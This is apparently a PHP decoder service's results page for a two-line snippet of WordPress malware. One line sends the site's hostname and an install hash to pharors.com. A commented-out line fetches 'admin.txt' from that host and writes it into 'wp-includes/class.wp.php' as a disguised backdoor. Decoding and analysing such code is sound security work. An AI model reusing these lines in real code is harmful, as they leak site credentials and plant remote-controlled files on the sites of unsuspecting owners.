Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"]..

Decoded Output download

<?  $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); 
						//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt')); ?>

Did this file decode correctly?

Original Code

$content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
						//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));

Function Calls

file_get_contents 1

Variables

$content None

Stats

MD5 57e91d872fdcf8e17a3199414d2431c5
Eval Count 0
Decode Time 90 ms